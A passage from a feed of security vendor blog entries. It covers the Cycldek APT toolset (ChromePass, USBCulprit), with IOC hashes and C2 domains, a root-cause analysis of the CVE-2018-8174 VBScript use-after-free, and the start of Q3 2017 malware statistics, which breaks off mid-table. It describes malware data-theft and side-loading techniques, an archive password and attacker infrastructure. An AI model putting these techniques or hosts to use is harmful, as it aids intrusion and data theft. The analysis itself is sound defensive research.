this one:\n \n \n {\n \"domain\": \".google.com\",\n \"id\": 1,\n \"name\": \"NID\",\n \"path\": \"/\",\n \"value\": \"%VALUE%\"\n }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n**__Figure 8_: Command line usage of the ChromePass tool._**\n\n#### \n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro) forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n**__Figure 9_: USBCulprit's loading flow, as observed in samples after 2017._**\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Boostrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000' corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched locally. If it exists, the malware would expect to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n**__Figure 10_: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n**__Figure 11_: Commands used to profile the network connectivity of the compromised host._**\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it's worth noting that we noted multiple points where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased \u2013 it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 Chromepass \n1EA07468EBDFD3D9EEC59AC57A490701 Chromepass \n07EE1B99660C8CD5207E128F44AA8CBC JsonCookies \n809196A64CA4A32860D28760267A1A8B Custom HDoor \n81660985276CF9B6D979753B6E581D34 Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 Custom HDoor\n\n \n\n**USBCulprit: **\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 USBCulrprit Payload\n\n \n\n**Toolset overlapping in both clusters:**\n\n**Common Name ** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description** \n---|---|---|---|--- \nchromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080\n\n | http://news.trungtamwtoa.com:88 | ChromePass \ngoopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443\n\nhttp://hcm.vietbaonam.com:443 | USBCulprit \n2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080\n\nttp://tinmoi.thoitietdulich.com:443\n\nhttp://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53\n\nhttp://tinmoi.vieclamthemde.com | USBCulprit \nqclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com\n\nhttp://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL \nsilverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443\n\nhttp://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53\n\nhttp://info.coreders.com:8080 | Custom HDoor \n \n \n\n**C&Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster\n\nhttp://tinmoi.vieclamthemde[.]com - Red Cluster\n\nhttp://kinhte.chototem[.]com - Red Cluster\n\nhttp://news.trungtamwtoa[.]com - Red Cluster\n\nhttp://mychau.dongnain[.]com - Red Cluster\n\nhttp://hcm.vietbaonam[.]com - Red Cluster\n\nhttp://login.thanhnienthegioi[.]com - Red Cluster\n\nhttp://103.253.25.73 - Red Cluster\n\nhttp://luan.conglyan[.]com - Red Cluster\n\nhttp://toiyeuvn.dongaruou[.]com - Red Cluster\n\nhttp://tintuc.daikynguyen21[.]com - Red Cluster\n\nhttp://web.laomoodwin[.]com - Red Cluster\n\nhttp://login.giaoxuchuson[.]com - Red Cluster\n\nhttp://lat.conglyan[.]com - Red Cluster\n\nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster\n\nhttp://laovoanew[.]com - Red Cluster\n\nhttp://cdn.laokpl[.]com - Red Cluster\n\nhttp://login.dangquanwatch[.]com - Blue Cluster\n\nhttp://info.coreders[.]com - Blue Cluster\n\nhttp://thanhnien.vietnannnet[.]com - Blue Cluster\n\nhttp://login.diendanlichsu[.]com - Blue Cluster\n\nhttp://login.vietnamfar[.]com - Blue Cluster\n\nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster\n\nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster\n\nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster\n\nhttp://khinhte.chinhsech[.]com - Blue Cluster\n\nhttp://images.webprogobest[.]com - Blue Cluster\n\nhttp://web.hcmuafgh[.]com - Blue Cluster\n\nhttp://news.cooodkord[.]com - Blue Cluster\n\nhttp://24h.tinthethaoi[.]com - Blue Cluster\n\nhttp://quocphong.ministop14[.]com - Blue Cluster\n\nhttp://nhantai.xmeyeugh[.]com - Blue Cluster\n\nhttp://thoitiet.yrindovn[.]com - Blue Cluster\n\nhttp://hanghoa.trenduang[.]com - Blue Cluster", "cvss3": {}, "published": "2020-06-03T10:00:32", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-05-10T11:03:43", "description": "\n\nIn late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.\n\n### **Searching for the zero day**\n\nOur story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133136/180508-the-king-is-dead-cve-18-1.png>)\n\n_Virustotal scan results for CVE-2018-8174_\n\nAfter the malicious sample was processed in our [sandbox system](<https://www.kaspersky.com/enterprise-security/wiki-section/products/sandbox>), we noticed that a fully patched version of Microsoft Word was successfully exploited. From this point we began a deeper analysis of the exploit. Let's take a look at the full infection chain:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133144/180508-the-king-is-dead-cve-18-2.png>)\n\n_Infection chain_\n\nThe infection chain consists of the following steps:\n\n * A victim receives a malicious Microsoft Word document.\n * After opening the malicious document, a second stage of the exploit is downloaded; an HTML page containing VBScript code.\n * The VBScript code triggers a Use After Free (UAF) vulnerability and executes shellcode.\n\n### **Initial analysis**\n\nWe'll start our analysis with the initial Rich Text Format (RTF) document, that was used to deliver the actual exploit for IE. It only contains one object, and its contents are obfuscated using a known obfuscation technique we call \"[nibble drop](<https://securelist.com/disappearing-bytes/84017/>)\".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133151/180508-the-king-is-dead-cve-18-3.png>)\n\n_Obfuscated object data in RTF document_\n\nAfter deobfuscation and hex-decoding of the object data, we can see that this is an OLE object that contains a [URL Moniker](<https://msdn.microsoft.com/ru-ru/en-en/library/windows/desktop/ms688580\\(v=vs.85\\).aspx>) CLSID. Because of this, the exploit initially resembles an older vulnerability leveraging the Microsoft HTA handler ([CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>)).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133158/180508-the-king-is-dead-cve-18-4.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133205/180508-the-king-is-dead-cve-18-5.png>)\n\n_URL Moniker is used to load an IE exploit_\n\nWith the CVE-2017-0199 vulnerability, Word tries to execute the file with the default file handler based on its attributes; the Content-Type HTTP header in the server's response being one of them. Because the default handler for the \"application/hta\" Content-Type is mshta.exe,it is chosen as the OLE server to run the script unrestricted. This allows an attacker to directly call ShellExecute and launch a payload of their choice.\n\nHowever, if we follow the embedded URL in the latest exploit, we can see that the content type in the server's response is not \"application/hta\", which was a requirement for CVE-2017-0199 exploitation, but rather \"text/html\". The default OLE server for \"text/html\" is mshtml.dll, which is a library that contains the engine, behind Internet Explorer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133212/180508-the-king-is-dead-cve-18-6.png>)\n\n_WINWORD.exe querying registry for correct OLE server_\n\nFurthermore, the page contains VBScript, which is loaded with a safemode flag set to its default value, '0xE'. Because this disallows an attacker from directly executing a payload, as was the case with the HTA handler, an Internet Explorer exploit is needed to overcome that.\n\nUsing a URL moniker like that to load a remote web page is possible, because Microsoft's patch for Moniker-related vulnerabilities (CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759) introduced an activation filter, which allows applications to specify which COM objects are restricted from instantiating at runtime.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133220/180508-the-king-is-dead-cve-18-7.png>)\n\n_Some of the filtered COM objects, restricted from creating by IActivationFilter in MSO.dll_\n\nAt the time of this analysis, the list of filtered CLSIDs consisted of 16 entries. TheMSHTML CLSID ({{25336920-03F9-11CF-8FD0-00AA00686F13}}) is not in the list, which is why the MSHTML COM server is successfully created in Word context.\n\nThis is where it becomes interesting. Despite a Word document being the initial attack vector, the vulnerability is actually in VBScript, not in Microsoft Word. This is the first time we've seen a URL Moniker used to load an IE exploit, and we believe this technique will be used heavily by malware authors in the future. This technique allows one to load and render a web page using the IE engine, even if default browser on a victim's machine is set to something different.\n\nThe VBScript in the downloaded HTML page contains both function names and integer values that are obfuscated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133228/180508-the-king-is-dead-cve-18-8.png>)\n\n_Obfuscated IE exploit_\n\n### **Vulnerability root cause analysis**\n\nFor the root cause analysis we only need to look at the first function ('TriggerVuln') in the deobfuscated version which is called right after 'RandomizeValues' and 'CookieCheck'.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133234/180508-the-king-is-dead-cve-18-9.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133240/180508-the-king-is-dead-cve-18-10.png>)\n\n_Vulnerability Trigger procedure after deobfuscation_\n\nTo achieve the desired heap layout and to guarantee that the freed class object memory will be reused with the 'ClassToReuse' object, the exploit allocates some class objects. To trigger the vulnerability this code could be minimized to the following proof-of-concept (PoC):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133249/180508-the-king-is-dead-cve-18-11.png>)\n\n_CVE-2018-8174 Proof Of Concept_\n\nWhen we then launch this PoC in Internet Explorer with page heap enabled we can observe a crash at the OLEAUT32!VariantClear function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133256/180508-the-king-is-dead-cve-18-12.png>)\n\n_Access Violation on a call to freed memory_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133304/180508-the-king-is-dead-cve-18-13.png>)\n\n_Freed memory pointer is reused when the second array (ArrB) is destroyed_\n\nWith this PoC we were able to trigger a Use-after-free vulnerability; both ArrA(1) and ArrB(1) were referencing the same 'ClassVuln' object in memory. This is possible because when \"Erase ArrA\" is called, the vbscript!VbsErase function determines that the type of the object to delete is a SafeArray, and then calls OLEAUT32!SafeArrayDestroy.\n\nIt checks that the pointer to a [tagSafeArray structure](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms221482\\(v=vs.85\\).aspx>) is not NULL and that its reference count, stored in the cLocks field is zero, and then continues to call ReleaseResources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133315/180508-the-king-is-dead-cve-18-14.png>)\n\n_VARTYPE of ArrA(1) is VT_DISPATCH, so VBScriptClass::Release is called to destruct the object_\n\nReleaseResources, in turn will check the fFeatures flags variable, and since we have an array of VARIANTs, it will subsequently call VariantClear; a function that iterates each member of an array and performs the necessary deinitialization and calls the relevant class destructor if necessary. In this case, VBScriptClass::Release is called to destroy the object correctly and handle destructors like Class_Terminate, since the VARTYPE of ArrA(1) is VT_DISPATCH.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133323/180508-the-king-is-dead-cve-18-15.png>)\n\n_Root cause of CVE-2018-8174 - 'refCount' being checked only once, before TerminateClass function_\n\nThis ends up being the root cause of the vulnerability. Inside the VBScriptClass::Release function, the reference count is checked only once, at the beginning of the function. Even though it can be (and actually is, in the PoC) incremented in an overloaded TerminateClass function, no checks will be made before finally freeing the class object.\n\n[Class_Terminate](<https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/objects-and-classes/object-lifetime-how-objects-are-created-and-destroyed>) is a deprecated method, now replaced by the 'Finalize' procedure. It is used to free acquired resources during object destruction and is executed as soon as object is set to nothing and there are no more references to that object. In our case, the Class_Terminate method is overloaded, and when a call to VBScriptClass::TerminateClass is made, it is dispatched to the overloaded method instead. Inside of that overloaded method, another reference is created to the ArrA(1) member. At this point ArrB(1) references ArrA(1), which holds a soon to be freed ClassVuln object. \n\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133332/180508-the-king-is-dead-cve-18-16.png>)\n\n_Crash, due to calling an invalid virtual method when freeing second object_\n\nAfter the Class_Terminate sub is finished, the object at ArrA(1) is freed, but ArrB(1) still maintains a reference to that freed class object. When the execution continues, and ArrB is erased, the whole cycle repeats, except that this time, ArrB(1) is referencing a freed ClassVuln object, and so we observe a crash when one of the virtual methods in the ClassVuln vtable is called.\n\n### **Conclusion**\n\nIn this write up we analyzed the core reasons behind CVE-2018-8174, a particularly interesting Use-After-Free vulnerability that was possible due to incorrect object lifetime handling in the Class_Terminate VBScript method. The exploitation process is different from what we've seen in exploits for older vulnerabilities (CVE-2016-0189 and CVE-2014-6332) as the Godmode technique is no longer used. The full exploitation chain is as interesting as the vulnerability itself, but is out of scope of this article.\n\nWith CVE-2018-8174 being the first public exploit to use a URL moniker to load an IE exploit in Word, we believe that this technique, unless fixed, will be heavily abused by attackers in the future, as It allows you force IE to load ignoring the default browser settings on a victim's system.\n\nWe expect this vulnerability to become one of the most exploited in the near future, as it won't be long until exploit kit authors start abusing it in both drive-by (via browser) and spear-phishing (via document) campaigns. To stay protected, we recommend applying latest security updates, and using a security solution with [behavior detection capabilities](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>).\n\nIn our opinion this is the same exploit which Qihoo360 Core Security Team called \"Double Kill\" in their [recent publication](<https://weibo.com/ttarticle/p/show?id=2309404230886689265523>). While this exploit is not limited to browser exploitation, it was reported as an IE zero day, which caused certain confusion in the security community.\n\nAfter finding this exploit we immediately shared the relevant information with Microsoft and they confirmed that it is in fact [CVE-2018-8174](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174>), and received an acknowledgement for the report.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/10092043/180508-the-king-is-dead-cve-18-20.png>)\n\n_This exploit was found in the wild and was used by an APT actor. More information about that APT actor and usage of the exploit is available to customers of Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com_\n\n### **Detection**\n\nKaspersky Lab products successfully detect and block all stages of the exploitation chain and payload with the following verdicts:\n\n * HEUR:Exploit.MSOffice.Generic \u2013 RTF document\n * PDM:Exploit.Win32.Generic - IE exploit \u2013 detection with [Automatic Exploit Prevention technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/automatic-exploit-prevention-aep>)\n * HEUR:Exploit.Script.Generic \u2013 IE exploit\n * HEUR:Trojan.Win32.Generic - Payload\n\n### **IOCs**\n\n * b48ddad351dd16e4b24f3909c53c8901 - RTF document\n * 15eafc24416cbf4cfe323e9c271e71e7 - Internet Explorer exploit (CVE-2018-8174)\n * 1ce4a38b6ea440a6734f7c049f5c47e2 - Payload\n * autosoundcheckers[.]com", "cvss3": {}, "published": "2018-05-09T06:00:56", "type": "securelist", "title": "The King is dead. Long live the King!", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2017-0199", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-8174"], "modified": "2018-05-09T06:00:56", "id": "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "href": "https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-10T11:33:49", "description": "\n\n## Q3 figures\n\nAccording to KSN data, Kaspersky Lab solutions detected and repelled **277,646,376 **malicious attacks from online resources located in 185 countries all over the world.\n\n**72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\nAttempted infections by malware that aims to steal money via online access to bank accounts were registered on **204,388** user computers.\n\nCrypto ransomware attacks were blocked on **186283 **computers of unique users.\n\nKaspersky Lab's file antivirus detected a total of **198,228,428** unique malicious and potentially unwanted objects.\n\nKaspersky Lab mobile security products detected:\n\n * **1,598,196 **malicious installation packages;\n * **19,748** mobile banking Trojans (installation packages);\n * **108,073** mobile ransomware Trojans (installation packages).\n\n## Mobile threats\n\n### Q3 events\n\n#### The spread of the Asacub banker\n\nIn the third quarter, we continued to monitor the activity of the mobile banking Trojan Trojan-Banker.AndroidOS.Asacub that actively spread via SMS spam. Q3 saw cybercriminals carry out a major campaign to distribute the Trojan, resulting in a tripling of the number of users attacked. Asacub activity peaked in July, after which there was a decline in the number of attacks: in September we registered almost three times fewer attacked users than in July.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-1-en.jpg>)\n\nNumber of unique users attacked by Trojan-Banker.AndroidOS.Asacub in Q2 and Q3 2017\n\n#### New capabilities of mobile banking Trojans\n\nQ3 2017 saw two significant events in the world of mobile banking Trojans.\n\nFirstly, the family of mobile banking Trojans Svpeng has acquired the [new modification Trojan-Banker.AndroidOS.Svpeng.ae](<https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/>) capable of granting all the necessary rights to itself and stealing data from other applications. To do this, it just needs to persuade the user to allow the Trojan to utilize special functions designed for people with disabilities. As a result, the Trojan can intercept text that a user is entering, steal text messages and even prevent itself from being removed.\n\nInterestingly, in August we discovered yet another modification of Svpeng that uses special features. Only, this time the Trojan was not banking related \u2013 instead of stealing data, it encrypts all the files on a device and demands a ransom in bitcoins.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-2.jpg>)\n\nTrojan-Banker.AndroidOS.Svpeng.ag. window containing ransom demand\n\nSecondly, the FakeToken family of mobile banking Trojans [has expanded the list of apps it attacks](<https://securelist.com/booking-a-taxi-for-faketoken/81457/>). If previously representatives of this family mostly overlaid banking and some Google apps (e.g. Google Play Store) with a phishing window, it is now also overlaying apps used to book taxis, air tickets and hotels. The aim of the Trojan is to harvest data from bank cards.\n\n#### The growth of WAP billing subscriptions\n\nIn the third quarter of 2017, we continued to monitor the increased activity of Trojans designed to [steal](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) users' money via subscriptions. To recap, these are Trojans capable of visiting sites that allow users to pay for services by deducting money from their mobile phone accounts. These Trojans can usually click buttons on such sites using special JS files, and thus make payments without the user's knowledge.\n\nOur Top 20 most popular Trojan programs in Q3 2017 included three malware samples that attack WAP subscriptions. They are Trojan-Dropper.AndroidOS.Agent.hb and Trojan.AndroidOS.Loapi.b in fourth and fifth, and Trojan-Clicker.AndroidOS.Ubsod.b in seventh place.\n\n### Mobile threat statistics\n\nIn the third quarter of 2017, Kaspersky Lab detected 1,598,196 malicious installation packages, which is 1.2 times more than in the previous quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-3-en.jpg>)\n\nNumber of detected malicious installation packages (Q4 2016 \u2013 Q3 2017)\n\n#### Distribution of mobile malware by type\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-4-en.jpg>)\n\nDistribution of new mobile malware by type (Q2 and Q3 2017)\n\nRiskTool (53.44%) demonstrated the highest growth in Q3 2017, with its share increasing by 12.93 percentage points (p.p.). The majority of all installation packages discovered belonged to the RiskTool.AndroidOS.Skymobi family.\n\nTrojan-Dropper malware (10.97%) came second in terms of growth rate: its contribution increased by 6.29 p.p. Most of the installation packages are detected as Trojan-Dropper.AndroidOS.Agent.hb.\n\nThe share of Trojan-Ransom programs, which was first in terms of the growth rate in the first quarter of 2017, continued to fall and accounted for 6.69% in Q3, which is 8.4 p.p. less than the previous quarter. The percentage of Trojan-SMS malware also fell considerably to 2.62% \u2013 almost 4 p.p. less than in Q2.\n\nIn Q3, Trojan-Clicker malware broke into this rating after its contribution increased from 0.29% to 1.41% in the space of three months.\n\n#### TOP 20 mobile malware programs\n\n_Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| Verdict | % of attacked users* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 67.14 \n2 | Trojan.AndroidOS.Boogr.gsh | 7.52 \n3 | Trojan.AndroidOS.Hiddad.ax | 4.56 \n4 | Trojan-Dropper.AndroidOS.Agent.hb | 2.96 \n5 | Trojan.AndroidOS.Loapi.b | 2.91 \n6 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.59 \n7 | Trojan-Clicker.AndroidOS.Ubsod.b | 2.20 \n8 | Backdoor.AndroidOS.Ztorg.c | 2.09 \n9 | Trojan.AndroidOS.Agent.gp | 2.05 \n10 | Trojan.AndroidOS.Sivu.c | 1.98 \n11 | Trojan.AndroidOS.Hiddapp.u | 1.87 \n12 | Backdoor.AndroidOS.Ztorg.a | 1.68 \n13 | Trojan.AndroidOS.Agent.ou | 1.63 \n14 | Trojan.AndroidOS.Triada.dl | 1.57 \n15 | Trojan-Ransom.AndroidOS.Zebt.a | 1.57 \n16 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.53 \n17 | Trojan.AndroidOS.Hiddad.an | 1.48 \n18 | 